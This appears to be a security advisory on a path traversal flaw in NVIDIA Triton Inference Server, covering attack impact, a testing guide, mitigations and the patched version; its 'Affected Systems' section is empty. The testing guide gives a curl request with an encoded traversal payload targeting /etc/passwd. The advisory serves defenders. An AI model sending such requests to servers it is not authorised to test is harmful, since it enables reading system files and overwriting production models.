Path Traversal in NVIDIA Triton Inference Server Allows Model Overwrite
Overview
NVIDIA disclosed a high-severity path traversal vulnerability in its Triton Inference Server, a widely used solution for deploying and serving AI models at scale. The vulnerability exists in the server's model loading endpoint, which is responsible for fetching models from a designated model repository. An attacker with network access to the Triton server's management interface could send a specially crafted API request to load or unload a model. By using directory traversal sequences (e.g., `..%2F` or `..\`) in the model name parameter, the attacker could break out of the intended model repository directory. This allowed for two primary attack vectors. First, an attacker could read arbitrary files from the server's filesystem that the Triton process had permissions to access, potentially exfiltrating sensitive configuration files, data, or even the source code of proprietary models. Second, and more critically, an attacker could overwrite arbitrary files. This could be used to overwrite an existing, legitimate production model with a malicious or poisoned version, leading to incorrect inferences, denial of service, or the execution of embedded payloads if the model format supports it. The vulnerability posed a significant risk to the integrity and confidentiality of MLOps pipelines relying on Triton.
Affected Systems
Testing Guide
1. Identify the URL for loading a model on your Triton server (e.g., `http://<triton-server>:8001/v2/repository/models/my-model/load`). 2. Using a tool like `curl`, send a POST request with a model name that includes a path traversal sequence pointing to a known file on the server. For example: `curl -X POST http://<triton-server>:8001/v2/repository/models/..%2f..%2f..%2fetc%2fpasswd/load` 3. If the server returns an error message indicating it could not load a model from `/etc/passwd` or returns a success code, it may be vulnerable. A properly patched server should deny the request as invalid.
Mitigation Steps
1. **Upgrade Triton**: Immediately update the NVIDIA Triton Inference Server to container version 25.10 or a later patched release. 2. **Restrict Network Access**: Ensure the Triton management API (typically on port 8001) is not exposed to untrusted networks. Use firewall rules to restrict access to authorized administrators and services only. 3. **Principle of Least Privilege**: Run the Triton server process with a dedicated, non-root user with the minimum required file system permissions. The model repository should ideally be mounted as read-only if dynamic model loading is not required. 4. **Use API Gateway**: Place an API gateway with request validation and URL sanitization capabilities in front of the Triton server to filter out malicious path traversal payloads.
Patch Details
The vulnerability is addressed in the NVIDIA Triton Inference Server container version 25.10 and later, available from the NVIDIA NGC catalog.